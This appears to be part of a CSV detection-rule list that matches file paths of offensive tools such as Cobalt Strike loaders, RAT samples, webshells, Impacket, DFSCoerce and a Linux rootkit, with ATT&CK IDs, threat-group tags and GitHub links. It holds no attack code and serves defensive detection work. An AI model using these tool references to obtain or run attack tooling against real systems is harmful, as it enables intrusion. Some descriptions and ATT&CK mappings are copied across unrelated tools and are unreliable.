"*/Dendron.exe*",".{0,1000}\/Dendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6536"
"*/Dendron.sln*",".{0,1000}\/Dendron\.sln.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6537"
"*/DeNiSe.git*",".{0,1000}\/DeNiSe\.git.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","6538"
"*/Dent/*/Loader/Loader.go*",".{0,1000}\/Dent\/.{0,1000}\/Loader\/Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","1","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","6539"
"*/Dent/Dent.go*",".{0,1000}\/Dent\/Dent\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","1","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","6540"
"*/Dent/Loader*",".{0,1000}\/Dent\/Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","1","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","6541"
"*/DenyOutboundFirewall.ahk*",".{0,1000}\/DenyOutboundFirewall\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6542"
"*/DeployPrinterNightmare.exe*",".{0,1000}\/DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","6543"
"*/DeployPrinterNightmare.exe*",".{0,1000}\/DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","6544"
"*/DesckVB Rat.exe*",".{0,1000}\/DesckVB\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6545"
"*/describeTicket.py*",".{0,1000}\/describeTicket\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6546"
"*/DesertFox/archive/*.zip*",".{0,1000}\/DesertFox\/archive\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","6547"
"*/DesktopShell.exe*",".{0,1000}\/DesktopShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","6548"
"*/detail/kali-linux/*",".{0,1000}\/detail\/kali\-linux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6549"
"*/detect_antivirus/*.js*",".{0,1000}\/detect_antivirus\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","6550"
"*/detect_antivirus/*.rb*",".{0,1000}\/detect_antivirus\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","6551"
"*/detect-hooks.c*",".{0,1000}\/detect\-hooks\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","6552"
"*/detect-hooks.cna*",".{0,1000}\/detect\-hooks\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","6553"
"*/detect-hooks.h*",".{0,1000}\/detect\-hooks\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","6554"
"*/Detect-Hooks/*",".{0,1000}\/Detect\-Hooks\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","6555"
"*/Devils-Rat *.exe*",".{0,1000}\/Devils\-Rat\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6556"
"*/Devils-Rat 8.0.exe*",".{0,1000}\/Devils\-Rat\s8\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6557"
"*/devilzShell.asp*",".{0,1000}\/devilzShell\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6558"
"*/devilzShell.cgi*",".{0,1000}\/devilzShell\.cgi.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6559"
"*/devilzShell.jsp*",".{0,1000}\/devilzShell\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6560"
"*/devilzShell.php*",".{0,1000}\/devilzShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6561"
"*/DFSCoerce.exe*",".{0,1000}\/DFSCoerce\.exe.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","6562"
"*/DFSCoerce.git*",".{0,1000}\/DFSCoerce\.git.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","6563"
"*/dfscoerce.py*",".{0,1000}\/dfscoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6564"
"*/DGPOEdit.zip*",".{0,1000}\/DGPOEdit\.zip.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","6565"
"*/dhcp-discover.nse*",".{0,1000}\/dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6566"
"*/dhcpd-noroute.conf*",".{0,1000}\/dhcpd\-noroute\.conf.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#linux","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","6567"
"*/Dialogs/Payload.hpp*",".{0,1000}\/Dialogs\/Payload\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6568"
"*/Diamond RAT Cracked.exe*",".{0,1000}\/Diamond\sRAT\sCracked\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6569"
"*/Diamorphine.git*",".{0,1000}\/Diamorphine\.git.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","6570"
